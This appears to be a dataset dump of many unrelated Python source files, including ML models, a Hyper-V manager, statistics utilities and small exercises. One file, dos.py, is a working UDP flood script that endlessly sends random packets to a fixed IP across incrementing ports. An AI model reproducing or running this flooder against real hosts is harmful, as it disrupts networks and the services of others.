in wordList:\n cnt = cnt + 1\n if word == func:\n function = wordList[cnt]\n functionList.append(function)\n return functionList\n\ndef createDictionary():\n dictionary = {}\n fileList = getFileNames()\n for file in fileList:\n dictionary['%s' % file] = createFunctionLists(file)\n return dictionary\n\nprint(createDictionary())\n","sub_path":"jsFunctionFinder.py","file_name":"jsFunctionFinder.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"389905397","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nfrom sklearn.linear_model import LogisticRegression\nlista='lista_feats_si_no.txt'\nhf = open(lista,'r')\nlines=hf.readlines()\n#load all feats\nY=[]\nX=[]\nfor line in lines:\n hf = h5py.File(line[:-1], \"r\")\n feats = (hf.get('fbank')).value\n X.append(np.mean(feats,axis=0))\n lab=(hf.get('label')).value\n Y.append(lab)\n hf.close()\n \nX=np.array(X) \nY=np.array(Y)\n\n\n\n#calcular media\nmeanX=X.mean(axis=0)\nX=X-meanX\n#calcular matriz de covarianzas\nSigma=np.cov(X.transpose())\n\nu, s, vh = np.linalg.svd(Sigma, full_matrices=True)\nXp=np.dot(X,u)\nplt.figure(1)\nplt.plot(Xp[Y==0,0],Xp[Y==0,1],'ob')\nplt.plot(Xp[Y==1,0],Xp[Y==1,1],'or')\nplt.show()\n\n\n\n","sub_path":"examples_classify/example_pca_si_no.py","file_name":"example_pca_si_no.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"88591603","text":"import re\nimport netaddr\n\nfrom virt.lib.core import exception\nfrom virt.lib.common.virtual_machine import BaseManager\nfrom virt.lib.common.network import test_network\nfrom virt.lib.windows.core import powershell\n\n\nclass PowerShellManager(BaseManager):\n @classmethod\n def create(\n cls, name, disk_file, vnic_list=None, cpu=1, memory=512, **kwargs):\n\n # Create a VM (new-vm)\n powershell.exec_powershell(\n 'new-vm', name=name, memorystartupbytes=str(memory) + \"MB\",\n vhdpath=disk_file)\n\n # Set CPU (set-vmprocessor)\n powershell.exec_powershell('set-vmprocessor', vmname=name, count=cpu)\n\n # Remove any existing NIC interfaces\n powershell.exec_powershell(\n 'remove-vmnetworkadapter', vmname=name)\n\n # Add NIC interfaces to VM (add-vmnetworkadapter)\n for vnic in vnic_list:\n powershell.exec_powershell(\n 'add-vmnetworkadapter', vmname=name, switchname=vnic.network,\n staticmacaddress=vnic.mac_addr, name=vnic.mac_addr)\n\n @classmethod\n def update(\n cls, name, vnic_list=None, cpu=1, memory=512, **kwargs):\n\n # Updating memory ( set-vm )\n # Create a VM (new-vm)\n powershell.exec_powershell(\n 'set-vm', name=name, memorystartupbytes=str(memory) + \"MB\")\n\n # Set CPU (set-vmprocessor)\n powershell.exec_powershell('set-vmprocessor', vmname=name, count=cpu)\n\n # Remove the existing network adapters except for Management Network.\n # Retaining management networks helps in saving MLTT licenses...\n mgmt_net_found = False\n if powershell.exec_powershell('get-vmnetworkadapter', vmname=name):\n for vnic in powershell.exec_powershell('get-vmnetworkadapter', vmname=name):\n if vnic.SwitchName != 'Management Network':\n powershell.exec_powershell('remove-vmnetworkadapter',\n vmname=name, name=vnic.Name)\n else:\n mgmt_net_found = True\n\n # Add NIC interfaces to VM (add-vmnetworkadapter)\n for vnic in vnic_list:\n if vnic.network == 'Management Network' and mgmt_net_found:\n continue\n powershell.exec_powershell(\n 'add-vmnetworkadapter', vmname=name, switchname=vnic.network,\n staticmacaddress=vnic.mac_addr, name=vnic.mac_addr)\n\n @classmethod\n def remove(cls, name):\n vm = powershell.exec_powershell(\n 'get-vm', name=name, select_clause='State')\n\n if len(vm) == 0:\n raise exception.NotFoundException(\n 'No such virtual machine %s' % name)\n\n vm = vm[0]\n if vm.State != 3:\n cls.power(name=name, oper='off')\n\n powershell.exec_powershell('remove-vm', name=name, force=True)\n\n @classmethod\n def power(cls, name, oper):\n mapping = {'on': 'start-vm', 'off': 'stop-vm'}\n\n if oper not in mapping:\n raise exception.ValueException(\n 'invalid operation %s. choices=[on|off]' % oper)\n\n try:\n if oper == 'off':\n powershell.exec_powershell(mapping[oper], name=name, force=True)\n else:\n powershell.exec_powershell(mapping[oper], name=name)\n except exception.ValueException:\n return True\n\n @classmethod\n def set_vnic(cls, name, test_ip_addr, **kwargs):\n test_mac_addr = test_network.get_mac_addr(test_ip_addr)\n powershell.exec_powershell(\n 'set-vmnetworkadapter', vmname=name, name=test_mac_addr, **kwargs)\n\n @classmethod\n def get_vm_list(cls):\n vm_list = powershell.exec_powershell('get-vm')\n return [vm.Name for vm in vm_list] if vm_list else []\n\n @classmethod\n def get_mgmt_ip_addr(cls, vm_name, ip_network):\n mgmt_ip_network = netaddr.IPNetwork(ip_network)\n\n iface_list = powershell.exec_powershell(\n 'get-vm', name=vm_name, select_clause='networkadapters'\n )[0].NetworkAdapters\n\n mgmt_ip_addr_list = []\n\n for iface in iface_list:\n for ip_network in iface['IPAddresses'].split():\n if netaddr.IPAddress(ip_network) in mgmt_ip_network:\n mgmt_ip_addr_list.append(ip_network)\n\n if len(mgmt_ip_addr_list) == 1:\n return mgmt_ip_addr_list[0]\n\n elif len(mgmt_ip_addr_list) > 1:\n raise exception.ConfigException(\n '%s has two management IP addresses (%s) that are belong to '\n 'the same subnet. This is likely a configuration error' % (\n vm_name, ', '.join(mgmt_ip_addr_list)))\n else:\n raise exception.ValueException(\n 'No management IP addresses are discovered')\n\n @classmethod\n def get_test_ip_addr(cls, vm_name):\n test_ip_addr_dict ={}\n iface_list = powershell.exec_powershell(\n 'get-vmnetworkadapter', vmname=vm_name,\n select_clause='IPAddresses,MacAddress'\n )\n\n for iface in iface_list:\n mac_addr = ':'.join(\n digit.encode('hex') for digit in iface.MacAddress.decode('hex'))\n if not mac_addr.startswith('b2'):\n continue\n\n test_ip_addr_dict[mac_addr] = {'ipv4': [], 'ipv6': []}\n\n for ip_addr in iface.IPAddresses:\n if re.match('\\d+\\.\\d+\\.\\d+\\.\\d+', ip_addr): # IPv4\n test_ip_addr_dict[mac_addr]['ipv4'].append(ip_addr)\n else: # Assume IPv6\n if ip_addr.startswith('fe80:'):\n continue\n test_ip_addr_dict[mac_addr]['ipv6'].append(ip_addr)\n\n return test_ip_addr_dict\n\n\n\n\n\n","sub_path":"lib/windows/virtual_machine/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650103558","text":"# -*- coding: utf-8 -*-\n# this flie is used to define customized settings\nimport os\n\nmssql_database = '[10.0.0.201].CrowdDB.dbo'\nmssql_tables = {\n\t'project': '.Project',\n\t'data_result': '.DataResult',\n\t'data_source': '.DataSource',\n\t'person': '.Person',\n\t'person_in_project': '.PersonInProject',\n}\n\napps = [\n\t'clothmark',\n\t'clothmark_2',\n 'facecmu',\n\t'fridge_mark',\n\t'10000face',\n\t'rectangle_box',\n\t'Ch_faces',\n\t'Ch_faceX',\n\t'shooting_range',\n\t'street_license',\n\t'faceinvideo'\n]\n\nDEFAULT_DECODING = \"utf-8\"\nDEFAULT_ENCODING = \"utf-8\"\nEDITOR = \"notepad\"\n","sub_path":"src/settings_local.py","file_name":"settings_local.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"194723365","text":"import torch\nfrom torch import nn\nfrom torchcrf import CRF\n\nclass NER_LSTM_CRF(nn.Module):\n def __init__(self,\n embedding_dim, # 词向量维度\n hidden_dim, # 隐藏层大小\n dropout, # dropout比率\n word2id, # 词的id表示\n tag2id): # 标签的id表示\n super().__init__()\n\n self.embedding_dim = embedding_dim\n self.hidden_dim = hidden_dim\n self.vocab_size = len(word2id) + 1\n self.tag_to_idx = tag2id\n self.target_size = len(tag2id)\n\n self.word_embeds = nn.Embedding(self.vocab_size, self.embedding_dim)\n self.dropout = nn.Dropout(dropout)\n\n # 因为是双向lstm,所以输出维度为self.hidden_dim // 2\n self.lstm = nn.LSTM(self.embedding_dim, self.hidden_dim // 2, num_layers=1,\n bidirectional=True, batch_first=False)\n\n # 接一个全连接层输出\n # 输入维度self.hidden_dim\n # 输出维度self.target_size\n self.hidden2tag = nn.Linear(self.hidden_dim, self.target_size)\n self.crf = CRF(self.target_size, batch_first=False)\n\n def forward(self, x):\n x = x.transpose(0,1)\n\n # word embedding\n embedding = self.word_embeds(x)\n\n # lstm输出\n outputs, hiddens = self.lstm(embedding)\n\n # dropout\n outputs = self.dropout(outputs)\n\n # 降维输出\n outputs = self.hidden2tag(outputs)\n\n # crf中解码\n outputs = self.crf.decode(outputs)\n return outputs\n\n def log_likehood(self, x, tags):\n \"\"\"\n 对数似然函数值\n \"\"\"\n x = x.transpose(0, 1)\n tags = tags.transpose(0, 1)\n\n embedding = self.word_embeds(x)\n outputs, hidden = self.lstm(embedding)\n outputs = self.dropout(outputs)\n outputs = self.hidden2tag(outputs)\n\n return - self.crf(outputs, tags)","sub_path":"model/LSTM_CRF.py","file_name":"LSTM_CRF.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"137149632","text":"import numpy as np\nimport pandas as pd\nimport math\nfrom Tree import *\n\nclass DecisionTreeRegressor:\n def __init__(self, filepath, max_depth):\n self.filepath = filepath\n self.max_depth = max_depth\n self.data = self.load_data()\n self.tree = Tree()\n\n def load_data(self):\n return pd.read_csv(self.filepath)\n\n def calculate_standard_deviation(self, data):\n return data[\"class\"].std()\n\n def get_all_splits(self, data, col):\n col_vals = data[col].unique()\n return self.get_all_splits_helper(col_vals, 0, np.array([]), np.array([]))\n\n def get_all_splits_helper(self, col_vals, col_ind, left_split, right_split):\n if col_ind == len(col_vals):\n return np.array([[left_split, right_split]])\n left_result = np.array([[[]]])\n right_result = np.array([[[]]])\n if left_split.shape[0] < len(col_vals) - 1:\n left_result = self.get_all_splits_helper(col_vals, col_ind+1, np.append(left_split, col_vals[col_ind]), right_split)\n if right_split.shape[0] < len(col_vals) - 1:\n right_result = self.get_all_splits_helper(col_vals, col_ind+1, left_split, np.append(right_split, col_vals[col_ind]))\n if left_result.size > 0 and right_result.size > 0:\n return np.concatenate((left_result, right_result), axis=0)\n return left_result if left_result.size > 0 else right_result\n\n\n def get_average(self, data):\n return data[\"class\"].mean()\n\n def calculate_std_gain(self, original_std, data, col):\n total_count = data.shape[0]\n splits = self.get_all_splits(data, col)\n max_gain = 0\n max_left_split = np.array([])\n max_right_split = np.array([])\n max_left_split_cats = np.array([])\n max_right_split_cats = np.array([])\n for split in splits:\n split_data_left = data.loc[data[col].isin(split[0]), :]\n split_data_right = data.loc[data[col].isin(split[1]), :]\n std = split_data_left.shape[0] / total_count * self.calculate_standard_deviation(split_data_left) + split_data_right.shape[0] / total_count * self.calculate_standard_deviation(split_data_right)\n gain = original_std - std\n if gain > max_gain:\n max_gain = gain\n max_left_split = split_data_left\n max_right_split = split_data_right\n max_left_split_cats = split[0]\n max_right_split_cats = split[1]\n return (max_gain, max_left_split, max_right_split, max_left_split_cats, max_right_split_cats)\n\n def get_max_col(self, data):\n cols = list(data)\n data_std = self.calculate_standard_deviation(data)\n max_criteria_val = 0\n max_col = 0\n max_left_split = np.array([])\n max_right_split = np.array([])\n max_left_split_cats = np.array([])\n max_right_split_cats = np.array([])\n for index, col in enumerate(cols):\n if index < len(cols) - 1:\n (criteria_val, left_split, right_split, left_split_cats, right_split_cats) = self.calculate_std_gain(data_std, data, col)\n if criteria_val > max_criteria_val:\n max_criteria_val = criteria_val\n max_left_split = left_split\n max_right_split = right_split\n max_left_split_cats = left_split_cats\n max_right_split_cats = right_split_cats\n max_col = index\n return (max_col, max_left_split, max_right_split, max_left_split_cats, max_right_split_cats)\n\n def train(self):\n self.tree = Tree(self.train_with_depth(self.data, self.max_depth))\n\n def train_with_depth(self, data, maxDepth):\n if maxDepth == 0:\n leaf = Node()\n leaf.value = self.get_average(data)\n return leaf\n else:\n cur = Node()\n (max_col, max_left_split, max_right_split, max_left_split_cats, max_right_split_cats) = self.get_max_col(data)\n cols = list(data)\n cur.col = max_col\n cur.value = self.get_average(data)\n cur.left_split_cats = max_left_split_cats\n cur.right_split_cats = max_right_split_cats\n if max_left_split.shape[0] > 0:\n cur.add_child(self.train_with_depth(max_left_split, maxDepth-1))\n if max_right_split.shape[0] > 0:\n cur.add_child(self.train_with_depth(max_right_split, maxDepth-1))\n return cur\n\n def predict(self, sample):\n return self.predict_with_node(sample, self.tree.head)\n\n def predict_with_node(self, sample, cur):\n if cur.col == -1:\n return cur.value\n if (sample[cur.col] in cur.left_split_cats) and len(cur.children) > 0:\n return self.predict_with_node(sample, cur.children[0])\n if (sample[cur.col] in cur.right_split_cats) and len(cur.children) > 1:\n return self.predict_with_node(sample, cur.children[1])\n return cur.value","sub_path":"DecisionTreeRegressor.py","file_name":"DecisionTreeRegressor.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"89067673","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function, absolute_import\n\nimport math\n\nimport numpy as np\nfrom scipy.stats import (binom,\n hypergeom,\n ttest_ind)\nfrom scipy.optimize import brentq\n\n\ndef binoLowerCL(n, x, cl=0.975, p=None, xtol=1e-12, rtol=4.4408920985006262e-16, maxiter=100):\n \"Lower confidence level cl confidence interval for Binomial p, for x successes in n trials\"\n if p is None:\n p = x/n\n lo = 0.0\n if (x > 0):\n f = lambda q: cl - binom.cdf(x - 1, n, q)\n lo = brentq(f, 0.0, p, xtol, rtol, maxiter)\n return lo\n\n\ndef binoUpperCL(n, x, cl=0.975, p=None, xtol=1e-12, rtol=4.4408920985006262e-16, maxiter=100):\n \"Upper confidence level cl confidence interval for Binomial p, for x successes in n trials\"\n if p is None:\n p = x/n\n hi = 1.0\n if (x < n):\n f = lambda q: binom.cdf(x, n, q) - (1 - cl)\n hi = brentq(f, p, 1.0, xtol, rtol, maxiter)\n return hi\n\n\ndef permuTestMean(x, y, reps=10 ** 5, stat='mean', side='greater_than', CI=False, CL=0.95):\n \"\"\"\n One-sided or two-sided, two-sample permutation test for equality of two\n means, with p-value estimated by simulated random sampling with reps replications.\n\n Tests the hypothesis that x and y are a random partition of x,y\n against the alternative that x comes from a population with mean\n (a) greater than that of the population from which y comes, if side = 'greater_than'\n (b) less than that of the population from which y comes, if side = 'less_than'\n (c) different from that of the population from which y comes, if side = 'both'\n\n If stat == 'mean', the test statistic is (mean(x) - mean(y))\n (equivalently, sum(x), since those are monotonically related)\n\n If stat == 't', the test statistic is the two-sample t-statistic--but the p-value\n is still estimated by the randomization, approximating the permutation distribution.\n The t-statistic is computed using scipy.stats.ttest_ind\n\n If CI == 'upper', computes an upper confidence bound on the true\n p-value based on the simulations by inverting Binomial tests.\n\n If CI == 'lower', computes a lower confidence bound on the true\n p-value based on the simulations by inverting Binomial tests.\n\n If CI == 'both', computes lower and upper confidence bounds on the true\n p-value based on the simulations by inverting Binomial tests.\n\n CL is the confidence limit for the confidence bounds.\n\n output is the estimated p-value and the test statistic, if CI == False\n output is if CI in {'lower','upper'}\n output is if CI == 'both'\n\n Dependencies: numpy, numpy.random, scipy.stats, binoUpperCL, binoLowerCL\n\n \"\"\"\n z = np.concatenate([x, y]) # pooled responses\n stats = dict(\n mean=lambda u: np.mean(u[:len(x)]) - np.mean(u[len(x):]),\n t=lambda u: ttest_ind(\n u[:len(y)], u[len(y):], equal_var=True)[0]\n )\n try:\n tst = stats[stat]\n except KeyError:\n raise ValueError(\"Unrecognized test statistic (stat): \" + stat)\n if side == 'greater_than':\n theStat = tst\n elif side == 'less_than':\n theStat = lambda u: -tst(u)\n elif side == 'both':\n theStat = lambda u: math.fabs(tst(u))\n else:\n raise ValueError(\"Unrecognized side choice: \" + side)\n ts = theStat(z)\n hits = np.sum([(theStat(np.random.permutation(z)) >= ts)\n for i in range(reps)])\n if CI == 'upper':\n return hits/reps, binoUpperCL(reps, hits, cl=CL), ts\n elif CI == 'lower':\n return hits/reps, binoLowerCL(reps, hits, cl=CL), ts\n elif CI == 'both':\n return hits/reps, \\\n (binoLowerCL(reps, hits, cl=1 - (1 - CL) / 2), binoUpperCL(reps, hits, cl=1 - (1 - CL) / 2)), \\\n ts\n else:\n return hits/reps, ts\n\n\n\ndef stratifiedPermutationTestMean(group, condition, response, groups, conditions):\n '''\n Calculates variability in sample means between treatment conditions, within groups.\n If there are two treatment conditions, the test statistic is the difference in means,\n aggregated across groups.\n If there are more than two treatment conditions, the test statistic is the standard deviation of\n the means, aggregated across groups.\n '''\n tst = 0.0\n if (len(groups) < 2):\n raise ValueError('Number of groups must be at least 2.')\n elif (len(groups) == 2):\n stat = lambda u: u[0] - u[1]\n elif (len(groups) > 2):\n stat = lambda u: np.std(u)\n for g in groups:\n gg = group == g\n x = [gg & (condition == c) for c in conditions]\n tst += stat([response[x[j]].mean() for j in range(len(x))])\n return tst\n\n\ndef permuteWithinGroups(group, condition, groups):\n permuted = condition.copy()\n for g in groups:\n gg = group == g\n permuted[gg] = np.random.permutation(condition[gg])\n return permuted\n\n\ndef stratifiedPermutationTest(group, condition, response, iterations=1.0e4, testStatistic=stratifiedPermutationTestMean):\n '''\n Stratified permutation test using the sum of the differences in means between two or more conditions in\n each group (stratum) as the test statistic.\n The test statistic is\n \\sum_{g in groups} [\n f(mean(response for cases in group g assigned to each condition))\n ].\n The function f is the difference if there are two conditions, and the standard deviation if there are\n more than two conditions.\n There should be at least one group and at least two conditions.\n Under the null hypothesis, all assignments to the two conditions that preserve the number of\n cases assigned to the conditions are equally likely.\n Groups in which all cases are assigned to the same condition are skipped; they do not contribute\n to the p-value since all randomizations give the same contribution to the difference in means.\n\n Dependencies: numpy (as np)\n '''\n groups = np.unique(group)\n conditions = np.unique(condition)\n if len(conditions) < 2:\n return 1.0, 1.0, 1.0, np.nan, None\n else:\n tst = testStatistic(group, condition, response, groups, conditions)\n dist = np.zeros(iterations)\n for i in range(int(iterations)):\n dist[i] = testStatistic(group,\n permuteWithinGroups(\n group, condition, groups),\n response, groups, conditions\n )\n\n # define the conditions, then map count_nonzero over them\n conds = [dist <= tst, dist >= tst, abs(dist) >= abs(tst)]\n pLeft, pRight, pBoth = np.array(\n map(np.count_nonzero, conds)) / iterations\n return pLeft, pRight, pBoth, tst, dist\n\n","sub_path":"permute/permute.py","file_name":"permute.py","file_ext":"py","file_size_in_byte":7087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"55549505","text":"class Solution:\n \"\"\"\n @param matrix: an input matrix\n @return: nums[0]: the maximum,nums[1]: the minimum\n \"\"\"\n\n def maxAndMin(self, matrix):\n # write your code here\n if not matrix: return []\n mx = mn = matrix[0][0]\n for row in matrix:\n for e in row:\n mx, mn = max(mx, e), min(mn, e)\n return [mx, mn]\n","sub_path":"lintcode/770-maximum-and-minimum.py","file_name":"770-maximum-and-minimum.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"296572880","text":"import sys\nimport os\nimport time\nimport socket\nimport random\n\n\n##############\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nbytes = random._urandom(1490)\n#############\narr = []\n\n\ndef dos(ip,port):\n sent = 0\n\n sock.sendto(bytes, (ip,port))\n sent = sent + 1\n print(sock)\n print (\"Sent %s packet to %s throught port:%s\"%(sent,ip,port))\n\n\n\nif __name__ == '__main__':\n port =3000\n while True:\n port=port+1\n d=dos('172.18.144.1',port)\n print(d)","sub_path":"dos.py","file_name":"dos.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"135809266","text":"from pusion.auto.detector import *\nfrom pusion.auto.generic_combiner import GenericCombiner\nfrom pusion.evaluation.evaluation_metrics import *\nfrom pusion.util.generator import *\n\n\nclass AutoCombiner(GenericCombiner):\n \"\"\"\n The `AutoCombiner` allows for automatic decision fusion using all methods provided by the framework, which are\n applicable to the given problem. The key feature of this combiner is the transparency in terms of it's outer\n behaviour. Based on the usage (i.e. method calls) and the automatically detected configuration,\n the `AutoCombiner` preselects all compatible methods from `pusion.core`. The main purpose is to retrieve fusion\n results obtained by the methods with the best performance without further user interaction.\n \"\"\"\n\n _SUPPORTED_PAC = [\n (Problem.GENERIC, AssignmentType.GENERIC, CoverageType.GENERIC),\n (Problem.MULTI_CLASS, AssignmentType.CRISP, CoverageType.REDUNDANT),\n (Problem.MULTI_CLASS, AssignmentType.CONTINUOUS, CoverageType.REDUNDANT),\n (Problem.MULTI_LABEL, AssignmentType.CRISP, CoverageType.REDUNDANT),\n (Problem.MULTI_LABEL, AssignmentType.CONTINUOUS, CoverageType.REDUNDANT),\n (Problem.MULTI_CLASS, AssignmentType.CRISP, CoverageType.COMPLEMENTARY_REDUNDANT),\n (Problem.MULTI_CLASS, AssignmentType.CONTINUOUS, CoverageType.COMPLEMENTARY_REDUNDANT),\n (Problem.MULTI_LABEL, AssignmentType.CRISP, CoverageType.COMPLEMENTARY_REDUNDANT),\n (Problem.MULTI_LABEL, AssignmentType.CONTINUOUS, CoverageType.COMPLEMENTARY_REDUNDANT)\n ]\n\n def __init__(self):\n super().__init__()\n self.selected_combiner = None\n self.validation_size = 0.5\n\n def train(self, decision_tensor, true_assignments):\n \"\"\"\n Train the AutoCombiner (AC) model. This method detects the configuration based on the ``decision_tensor`` and\n trains all trainable combiners that are applicable to this configuration.\n\n :param decision_tensor: `numpy.array` of shape `(n_classifiers, n_samples, n_classes)` or a `list` of\n `numpy.array` elements of shape `(n_samples, n_classes')`, where `n_classes'` is classifier-specific\n due to the coverage.\n\n Tensor of either crisp or continuous decision outputs by different classifiers per sample.\n\n :param true_assignments: `numpy.array` of shape `(n_samples, n_classes)`.\n Matrix of either crisp or continuous class assignments which are considered true for each sample during\n the training procedure.\n \"\"\"\n\n # Split into train and validation data.\n dt_train, ta_train, dt_valid, ta_valid = split_into_train_and_validation_data(decision_tensor, true_assignments,\n self.validation_size)\n # Encapsulated training phase.\n super().train(dt_train, ta_train)\n # Encapsulated evaluation phase.\n super().combine(dt_valid)\n performance_per_combiner = np.zeros(len(self.combiners))\n for i in range(len(self.combiners)):\n comb_res = self.multi_combiner_decision_tensor[i]\n performance_per_combiner[i] = accuracy(ta_valid, comb_res)\n self.selected_combiner = self.combiners[performance_per_combiner.argmax()]\n # Clear temporarily obtained fusion results.\n self.multi_combiner_decision_tensor = []\n # Here, the AutoCombiner could be trained on the whole dataset again.\n # super().train(decision_tensor, true_assignments)\n\n def combine(self, decision_tensor):\n \"\"\"\n Combine decision outputs using the AutoCombiner (AC) model. Both continuous and crisp classification outputs are\n supported. This procedure involves selecting the best method regarding its classification performance in case\n of a trained AC.\n\n :param decision_tensor: `numpy.array` of shape `(n_classifiers, n_samples, n_classes)` or a `list` of\n `numpy.array` elements of shape `(n_samples, n_classes')`, where `n_classes'` is classifier-specific\n due to the coverage.\n\n Tensor of either crisp or continuous decision outputs by different classifiers per sample.\n\n :return: A matrix (`numpy.array`) of crisp or continuous class assignments which represents fused decisions.\n Axis 0 represents samples and axis 1 the class labels which are aligned with axis 2 in\n ``decision_tensor`` input tensor.\n \"\"\"\n super().combine(decision_tensor) # TODO: Delete. Left for insights into performances of preselected combiners.\n\n if self.selected_combiner is not None:\n return self.selected_combiner.combine(decision_tensor)\n else:\n raise TypeError(\"No selection performed. Use train() before combining to obtain an automatic selection.\")\n\n def set_validation_size(self, validation_size):\n \"\"\"\n Set the validation size, based on which the training data is split and the best combiner is selected.\n\n :param validation_size: A `float` between `0` and `1.0`. Ratio of the validation data set.\n \"\"\"\n self.validation_size = validation_size\n\n def get_selected_combiner(self):\n \"\"\"\n :return: The method selected by the `AutoCombiner`.\n \"\"\"\n return self.selected_combiner\n","sub_path":"pusion/auto/auto_combiner.py","file_name":"auto_combiner.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"337339328","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport os,sys,math,argparse,ast\nimport pandas as pd\nimport numpy as np\nimport datasets as ds\nfrom models import *\n\n# Parsing arguments\nparser = argparse.ArgumentParser(description='Training args')\nparser.add_argument('--model', type=str, required=True)\nparser.add_argument('--dataname', type=str, required=True)\nparser.add_argument('--epoch', type=int, default=20)\nparser.add_argument('--batchsize', type=int, default=32)\nparser.add_argument('--output', default='tmp')\nparser.add_argument('--gpu', type=int, default=0)\nparser.add_argument('--val',help='True or False flag, input should be either \"True\" or \"False\".',type=ast.literal_eval, default=True)\nargs = parser.parse_args()\n\n# select gpu\nos.environ['CUDA_VISIBLE_DEVICES'] = str(args.gpu)\n\ndataset = ds.load_data(args)\ndataset.get_validation()\n\n# Construct model\nif args.model not in models:\n raise Exception('Unknown model:', args.model)\n\nmodel = models[args.model](\n input_shape=dataset.get_input_shape(),\n output_shape=dataset.get_output_shape(),\n output=args.output\n)\n\nmodel.main_loop(dataset,\n epochs = args.epoch,\n batchsize = args.batchsize,\n reporter = ['loss'],\n validation = args.val\n)\n\nx_gen,y_sample = model.decodey(dataset.test_labels,resample_num=10)\ngen_data = np.hstack((y_sample, x_gen))\nnp.savetxt('gen_data.csv', gen_data, fmt='%.3f',delimiter = ',')","sub_path":"run_cvae.py","file_name":"run_cvae.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"114342320","text":"\"\"\"\n Run\n python3 read_dmm.py \n\"\"\"\nimport sys\nimport time\nimport serial\nimport string as str\n\ndef read_from_dmm():\n # ~ ser.write(b':ABORt?\\r\\n')\n # ~ ser.write(b'INITiate\\r\\n')\n ser.write(b':DATA:FRESH?\\r\\n')\n #ser.write(b':FETCh?\\r\\n')\n ser.flush()\n\n out = bytes()\n\n time.sleep(0.1) # wait for 100ms for measurements\n while ser.inWaiting() > 0:\n out += ser.read(1)\n if out != '':\n out=out.rstrip()\n\n print(len(out))\n\n return out.decode(\"utf-8\")\n\n\n# configure the serial connections\nser = serial.Serial(\n port='/dev/ttyUSB0',\n baudrate=19200\n)\n\nif ser.isOpen() == False:\n ser.open()\nelse:\n ser.close()\n ser.open()\n\nser.reset_output_buffer()\nser.reset_input_buffer()\n\nser.flushInput()\nser.flushOutput()\n\n#ser.open()\n#ser.isOpen()\n\n#C0s =[150, 330, 560, 820, 1150] # coupling, pF\n\nlogfile= sys.argv[1];\nfreq_start = int(sys.argv[2]) # start frequency , Hz\nfreq_end = int(sys.argv[3]) # end frequency, Hz\ndf = int(sys.argv[4]) # frequency step, Hz\n\n\nwith open(logfile,'a') as f:\n f.write(\"#\" + \"-\"*80 + \"\\n\")\n\n freq = freq_start\n\n while freq <= freq_end:\n\n print(\"-\"*80, \"\\nfreq=\", freq, \" .. press ENTER\", flush=True)\n\n input()\n\n val = read_from_dmm() # in [mVAC]\n\n print(\"value=\", val, flush=True)\n\n f.write(\"%d %s\\n\" % (freq, val))\n f.flush()\n\n freq = freq + df\n\n\n#\n# testing\n#\n# ~ while True:\n # ~ print(\"-\"*80, \"\\nTo read press ENTER\", flush=True)\n\n # ~ input()\n\n # ~ val = read_from_dmm() # in [mVAC]\n\n # ~ print(\"value=\", val, flush=True)\n","sub_path":"sknikr/SkNiKr_podatki/meritve/SinusnoSiljenje/read_dmm.py","file_name":"read_dmm.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"638747206","text":"def merge_sort(xlist):\r\n if len(xlist) <= 1:\r\n return xlist\r\n else:\r\n xleft = xlist[:len(xlist)//2]\r\n xright = xlist[len(xlist)//2:]\r\n sorted_left = merge_sort(xleft)\r\n sorted_right = merge_sort(xright)\r\n print(xright)\r\n return merge(sorted_left,sorted_right)\r\n \r\n","sub_path":"PythonExercise/mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"28727027","text":"from flask import Flask\nfrom flask import render_template # Add this as the last import at the beginning of the file\n\n# create an instance of our class and pass the name of our module\n# the app instance needs to know the name so it can find our templates and static folder files\napp = Flask(__name__)\n\nages = {\n 'bob': '43',\n 'alice': '29'\n}\n\n@app.route('/users/')\ndef users(user):\n age = ages.get(user)\n return render_template('users.html', user=user, age=age)\n\n# A route has been defined using a decorator. Unlike the timeit decorator,\n# this one takes a url as an argument. The decorator is saying ‘if the user navigates to the\n# address /, then run the function below’, i.e. the decorated function.\n@app.route('/')\ndef hello_world():\n # Our function returns the text ‘Hello World’\n return 'Hello World!'\n\n# use if __name__ == ‘__main__’: to ensure the app is only run when instantiated directly\n# from the Python interpreter, not when imported from another file\nif __name__ == '__main__':\n # run our app using app.run()\n app.run()\n\n'''\nIt’s also possible to automatically convert numbers to ints and floats by using this conversion syntax.\n\nIf our users were stored in a list, we could have used this syntax:\n\n@app.route('/users/')\ndef users(user_id):\n'''\n","sub_path":"Stream-2/Back-End-Development/32.Flask/5.Templates/flask_test.py","file_name":"flask_test.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"519786716","text":"import argparse\nimport sys\n\n\n# MAIN -------------------------------------------------------------------- 